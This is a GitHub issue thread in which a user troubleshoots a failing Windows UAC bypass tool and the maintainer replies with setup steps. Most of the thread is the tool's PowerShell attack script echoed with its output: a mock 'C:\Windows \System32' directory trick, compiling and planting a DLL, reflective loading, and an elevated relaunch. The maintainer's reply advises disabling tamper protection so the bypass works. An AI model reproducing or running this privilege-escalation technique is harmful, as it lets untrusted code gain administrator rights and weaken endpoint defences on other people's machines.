search

x0xr00t / Automated-MUlti-UAC-Bypass

Automated Multi UAC BYPASS for win10|win11|win12-pre-release|ws2019|ws2022
404 stars 69 forks source link

Doesn't work on Windows 10 Enterprise 22H2 Build 19045.4170 #31

Closed KoleckOLP closed 2 months ago

KoleckOLP commented 2 months ago

I get the script to run but it pops up UAC, so it doesn't get any elevated privilatges. I don't understand what IIS librararies am I supposed to install, could you please clarify that?

I also briefly tried it on Server 2012 which is not listed as supported and got the same issue I just get UAC and not elevation.

KoleckOLP commented 2 months ago

POWERSHELL:

Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\test> Set-ExecutionPolicy Bypass -Scope CurrentUser

Execution Policy Change
The execution policy helps protect you from scripts that you do not trust. Changing the execution policy might expose
you to the security risks described in the about_Execution_Policies help topic at
https:/go.microsoft.com/fwlink/?LinkID=135170. Do you want to change the execution policy?
[Y] Yes  [A] Yes to All  [N] No  [L] No to All  [S] Suspend  [?] Help (default is "N"): A
PS C:\Users\test> cd .\Documents\
PS C:\Users\test\Documents> cd ..
PS C:\Users\test> cd Dow
cd : Cannot find path 'C:\Users\test\Dow' because it does not exist.
At line:1 char:1
+ cd Dow
+ ~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Users\test\Dow:String) [Set-Location], ItemNotFoundException
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetLocationCommand

PS C:\Users\test> cd .\Downloads\
PS C:\Users\test\Downloads> ls

    Directory: C:\Users\test\Downloads

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          7/1/2024   2:48 PM                Automated-MUlti-UAC-Bypass-1.5.9-beta
d-----          7/1/2024   3:22 PM                Automated-MUlti-UAC-Bypass-master
d-----          7/1/2024   2:18 PM                disable-windows-defender.github.io-master
d-----          7/1/2024   2:34 PM                HEVD.3.00
-a----          7/1/2024   2:41 PM           1999 51410.txt
-a----          7/1/2024   2:48 PM           9478 Automated-MUlti-UAC-Bypass-1.5.9-beta.zip
-a----          7/1/2024   2:50 PM          73316 Automated-MUlti-UAC-Bypass-master.zip
-a----          7/1/2024   2:18 PM          12987 disable-windows-defender.github.io-master.zip
-a----          7/1/2024   2:34 PM         480665 HEVD.3.00.zip
-a----          7/1/2024   2:58 PM       10694656 iisexpress_amd64_en-US.msi
-a----          7/1/2024   2:58 PM        4636672 iisexpress_x86_en-US.msi
-a----          7/1/2024   2:08 PM        2492669 Windows-OS-Funny-2.jpg.png

PS C:\Users\test\Downloads> cd .\Automated-MUlti-UAC-Bypass-master\
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> ls

    Directory: C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master

Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----          7/1/2024   2:50 PM                .github
-a----          7/1/2024   2:50 PM         118784 cmstp.exe
-a----          7/1/2024   2:50 PM          17408 cmstp.exe.mui
-a----          7/1/2024   2:50 PM          36864 cmstplua.dll
-a----          7/1/2024   2:50 PM           2560 cmstplua.dll.mui
-a----          7/1/2024   2:50 PM           8044 file.ps1
-a----          7/1/2024   2:50 PM           4417 README.md
-a----          7/1/2024   3:22 PM           7168 sl0p.dll
-a----          7/1/2024   2:50 PM           4343 sl0puacb.cs

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> .\file.ps1

 000000000000000000000000000000000000000000
 0 Sl0ppyR00t Gonna Check the OS version. 0
 0      We do the UAC based on the OS     0
 0    So that you don't need to check it. 0
 0            Team Sl0ppyRoot             0
 0               ~x0xr00t~                0
 000000000000000000000000000000000000000000

 0000000000000000000000000000000000000000000
 0 Sl0ppyR00t says it's a Windows 10 Enterprise! 0
 0000000000000000000000000000000000000000000

 00000000000000000000000000000000000000
 0 Sl0ppyR00t Making Mock Folder..... 0
 00000000000000000000000000000000000000
New-Item : An item with the specified name \\?\C:\Windows\System32 already exists.
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:96 char:1
+ New-Item "\\?\C:\Windows\System32" -ItemType Directory
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceExists: (\\?\C:\Windows\System32:String) [New-Item], IOException
    + FullyQualifiedErrorId : DirectoryExist,Microsoft.PowerShell.Commands.NewItemCommand

 {Sl0ppyr00t} Making Mock Folder of (C:\windows /system32) is done.

 00000000000000000000000000000000000000
 0 Sl0ppyR00t Making DLL Files ...... 0
 00000000000000000000000000000000000000
Add-Type : (0) : Error generating Win32 resource: Access is denied.
(1) : using System;
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:106 char:1
+ Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (Microsoft.Power...peCompilerError:AddTypeCompilerError) [Add-Type], Except
   ion
    + FullyQualifiedErrorId : SOURCE_CODE_ERROR,Microsoft.PowerShell.Commands.AddTypeCommand

Add-Type : (0) : Warning as Error: Unable to delete temporary file
'c:\Windows\System32\CSC133C135CFF474EBF823EEBE2645C9841.TMP' used for default Win32 resource -- The system cannot
find the file specified.
(1) : using System;
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:106 char:1
+ Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (Microsoft.Power...peCompilerError:AddTypeCompilerError) [Add-Type], Except
   ion
    + FullyQualifiedErrorId : SOURCE_CODE_ERROR,Microsoft.PowerShell.Commands.AddTypeCommand

Add-Type : Cannot add type. Compilation errors occurred.
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:106 char:1
+ Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Add-Type], InvalidOperationException
    + FullyQualifiedErrorId : COMPILER_ERRORS,Microsoft.PowerShell.Commands.AddTypeCommand

 {Sl0ppyr00t} Making DLL files is done.

 0000000000000000000000000000000000000
 0 Sl0ppyR00t Copy DLL Files to Mock 0
 0000000000000000000000000000000000000
Copy-Item : Access to the path 'C:\Windows\System32\sl0p.dll' is denied.
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:115 char:1
+ Copy-Item "sl0p.dll" -Destination "C:\Windows\System32"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\test\D...master\sl0p.dll:FileInfo) [Copy-Item], Unauthorized
   AccessException
    + FullyQualifiedErrorId : CopyFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.CopyItemCommand

 {Sl0ppyr00t} Copy Dll to Mock Folder of system32 is done.

 0000000000000000000000000000000000000000
 0 Sl0ppyR00t Verify Place of DLL Files 0
 0000000000000000000000000000000000000000
Get-ChildItem : Cannot find path 'C:\Windows \System32\sl0p.dll' because it does not exist.
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:124 char:1
+ Get-ChildItem "C:\Windows \System32\sl0p.dll"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Windows \System32\sl0p.dll:String) [Get-ChildItem], ItemNotFoundExce
   ption
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

 {Sl0ppyr00t} File Is there.

GAC    Version        Location
---    -------        --------
False  v4.0.30319
Start-Process : This command cannot be run due to the error: The operation was canceled by the user.
At C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master\file.ps1:133 char:1
+ Start-Process powershell.exe -Verb RunAs -ArgumentList ('-noprofile - ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Start-Process], InvalidOperationException
    + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand

CMD:

Microsoft Windows [Version 10.0.19045.4170]
(c) Microsoft Corporation. All rights reserved.

C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master>type file.ps1 | powershell.exe
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Author: P.Hoogeveem
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # The main .ps1 file been re-dev by dev: @keytrap-x86
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Aka: x0xr00t
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Build: 20210809
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Name: UAC Bypass Win Server 2019| Win Server 2022 | Win 10 | Win 11 | win 12 pre-release
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Impact: Privesc
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Method: DllReflection
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Usage: Run the .ps1 file.
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master>
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Function to get the PowerShell location
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> function Get-PowerShellLocation {
>>     # Try to find PowerShell v7
>>     $pwshPath = "C:\Program Files\PowerShell\7\pwsh.exe"
>>     if (Test-Path $pwshPath) {
>>         return $pwshPath
>>     }
>>
>>     # Try to find PowerShell v2
>>     $psPath = Join-Path $env:SystemRoot "System32\WindowsPowerShell\v1.0\powershell.exe"
>>     if (Test-Path $psPath) {
>>         return $psPath
>>     }
>>
>>     # Try to find PowerShell v1
>>     $psv1Path = Join-Path $env:SystemRoot "System32\WindowsPowerShell\v1.0\powershell.exe"
>>     if (Test-Path $psv1Path) {
>>         return $psv1Path
>>     }
>>
>>     # PowerShell not found
>>     Write-Host "PowerShell location not found." -ForegroundColor Red
>>     exit
>> }
>>
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # Get the PowerShell location
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> $PowerShellLocation = Get-PowerShellLocation
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master>
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 000000000000000000000000000000000000000000"
 000000000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0 Sl0ppyR00t Gonna Check the OS version. 0"
 0 Sl0ppyR00t Gonna Check the OS version. 0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0      We do the UAC based on the OS     0"
 0      We do the UAC based on the OS     0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0    So that you don't need to check it. 0"
 0    So that you don't need to check it. 0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0            Team Sl0ppyRoot             0"
 0            Team Sl0ppyRoot             0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0               ~x0xr00t~                0"
 0               ~x0xr00t~                0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 000000000000000000000000000000000000000000"
 000000000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> $user = $(cmd.exe /c echo %username%)
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> # OS-Check
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> $OSVersion = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion" -Name ProductName).ProductName
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master>
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> $supportedVersions = @(
>>     "Windows 10 Home",
>>     "Windows 10 Pro",
>>     "Windows 10 Education",
>>     "Windows 10 Enterprise",
>>     "Windows 10 Enterprise 2015",
>>     "Windows 10 Mobile and Mobile Enterprise",
>>     "Windows 10 IoT Core",
>>     "Windows 10 IoT Enterprise LTSC 2021",
>>     "Windows 10 IoT Mobile Enterprise",
>>     "Windows Server 2019 Standard",
>>     "Windows Server 2019 Datacenter",
>>     "Windows Server 2019 Essentials",
>>     "Windows Server 2019 Azure Core",
>>     "Windows Server 2022 Standard",
>>     "Windows Server 2022 Datacenter",
>>     "Windows Server 2022 Azure Core",
>>     "Windows 11 Home",
>>     "Windows 11 Pro",
>>     "Windows 11 Education",
>>     "Windows 11 Enterprise",
>>     "Windows 11 IoT Enterprise",
>>     "Windows 11 IoT Mobile Enterprise",
>>     "Windows 11 Team",
>>     "Windows 11 Enterprise Multi-session"
>> )
>>
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> if ($supportedVersions -notcontains $OSVersion) {
>>     Write-Host "Unsupported OS version: $OSVersion"
>>     Write-Host "Exiting..."
>>     exit
>> } else {
>>     Write-Host " 0000000000000000000000000000000000000000000"
>>     Write-Host " 0 Sl0ppyR00t says it's a $OSVersion! 0"
>>     Write-Host " 0000000000000000000000000000000000000000000"
>>     Write-Host ""
>>     Write-Host ""
>> }
>>
 0000000000000000000000000000000000000000000
 0 Sl0ppyR00t says it's a Windows 10 Enterprise! 0
 0000000000000000000000000000000000000000000

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 00000000000000000000000000000000000000"
 00000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0 Sl0ppyR00t Making Mock Folder..... 0"
 0 Sl0ppyR00t Making Mock Folder..... 0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 00000000000000000000000000000000000000"
 00000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> New-Item "\\?\C:\Windows\System32" -ItemType Directory
New-Item : An item with the specified name \\?\C:\Windows\System32 already exists.
At line:1 char:1
+ New-Item "\\?\C:\Windows\System32" -ItemType Directory
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ResourceExists: (\\?\C:\Windows\System32:String) [New-Item], IOException
    + FullyQualifiedErrorId : DirectoryExist,Microsoft.PowerShell.Commands.NewItemCommand

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " {Sl0ppyr00t} Making Mock Folder of (C:\windows /system32) is done."
 {Sl0ppyr00t} Making Mock Folder of (C:\windows /system32) is done.
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 00000000000000000000000000000000000000"
 00000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0 Sl0ppyR00t Making DLL Files ...... 0"
 0 Sl0ppyR00t Making DLL Files ...... 0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 00000000000000000000000000000000000000"
 00000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "sl0p.dll"
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) -ReferencedAssemblies "System.Windows.Forms" -OutputAssembly "C:\Windows\System32\sl0p.dll"
Add-Type : (0) : Error generating Win32 resource: Access is denied.
(1) : using System;
At line:1 char:1
+ Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (Microsoft.Power...peCompilerError:AddTypeCompilerError) [Add-Type], Except
   ion
    + FullyQualifiedErrorId : SOURCE_CODE_ERROR,Microsoft.PowerShell.Commands.AddTypeCommand

Add-Type : (0) : Warning as Error: Unable to delete temporary file
'c:\Windows\System32\CSC4CDCE3D071504F5F8FDE2935A652E620.TMP' used for default Win32 resource -- The system cannot
find the file specified.
(1) : using System;
At line:1 char:1
+ Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (Microsoft.Power...peCompilerError:AddTypeCompilerError) [Add-Type], Except
   ion
    + FullyQualifiedErrorId : SOURCE_CODE_ERROR,Microsoft.PowerShell.Commands.AddTypeCommand

Add-Type : Cannot add type. Compilation errors occurred.
At line:1 char:1
+ Add-Type -TypeDefinition ([IO.File]::ReadAllText("$pwd\sl0puacb.cs")) ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidData: (:) [Add-Type], InvalidOperationException
    + FullyQualifiedErrorId : COMPILER_ERRORS,Microsoft.PowerShell.Commands.AddTypeCommand

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " {Sl0ppyr00t} Making DLL files is done."
 {Sl0ppyr00t} Making DLL files is done.
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0000000000000000000000000000000000000"
 0000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0 Sl0ppyR00t Copy DLL Files to Mock 0"
 0 Sl0ppyR00t Copy DLL Files to Mock 0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0000000000000000000000000000000000000"
 0000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Copy-Item "sl0p.dll" -Destination "C:\Windows\System32"
Copy-Item : Access to the path 'C:\Windows\System32\sl0p.dll' is denied.
At line:1 char:1
+ Copy-Item "sl0p.dll" -Destination "C:\Windows\System32"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : PermissionDenied: (C:\Users\test\D...master\sl0p.dll:FileInfo) [Copy-Item], Unauthorized
   AccessException
    + FullyQualifiedErrorId : CopyFileInfoItemUnauthorizedAccessError,Microsoft.PowerShell.Commands.CopyItemCommand

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " {Sl0ppyr00t} Copy Dll to Mock Folder of system32 is done."
 {Sl0ppyr00t} Copy Dll to Mock Folder of system32 is done.
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0000000000000000000000000000000000000000"
 0000000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0 Sl0ppyR00t Verify Place of DLL Files 0"
 0 Sl0ppyR00t Verify Place of DLL Files 0
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " 0000000000000000000000000000000000000000"
 0000000000000000000000000000000000000000
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Get-ChildItem "C:\Windows \System32\sl0p.dll"
Get-ChildItem : Cannot find path 'C:\Windows \System32\sl0p.dll' because it does not exist.
At line:1 char:1
+ Get-ChildItem "C:\Windows \System32\sl0p.dll"
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : ObjectNotFound: (C:\Windows \System32\sl0p.dll:String) [Get-ChildItem], ItemNotFoundExce
   ption
    + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.GetChildItemCommand

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host ""

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> Write-Host " {Sl0ppyr00t} File Is there."
 {Sl0ppyr00t} File Is there.
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("$pwd\sl0p.dll"))

GAC    Version        Location
---    -------        --------
False  v4.0.30319

PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master>
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> $currentUser = New-Object Security.Principal.WindowsPrincipal $([Security.Principal.WindowsIdentity]::GetCurrent())
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> $testadmin = $currentUser.IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
PS C:\Users\test\Downloads\Automated-MUlti-UAC-Bypass-master> if ($testadmin -eq $false) {
>> Start-Process powershell.exe -Verb RunAs -ArgumentList ('-noprofile -noexit -file "{0}" -elevated' -f ($myinvocation.MyCommand.Definition))
>> exit $LASTEXITCODE
>> }
>> # Get the ID and security principal of the current user account
>>
Start-Process : This command cannot be run due to the error: The operation was canceled by the user.
At line:2 char:1
+ Start-Process powershell.exe -Verb RunAs -ArgumentList ('-noprofile - ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Start-Process], InvalidOperationException
    + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand
x0xr00t commented 2 months ago

Lets start with server 2012. Its not tested nor supported. This is due to the fact that windows server 2019 + windows server 2022 use cmstp. likely not working on older windows server version, alto not tested.

Next windows 10, to make sure its working. Go to the section to install extra windows components, install the IIS ([Install IIS (Internet Information Services)]) the cmstp will be installd in to system32 after that. make sure to also check to disable tamper, and also make sure the path for mock is "(C:\Windows\system32" been copied to "C:\Windows "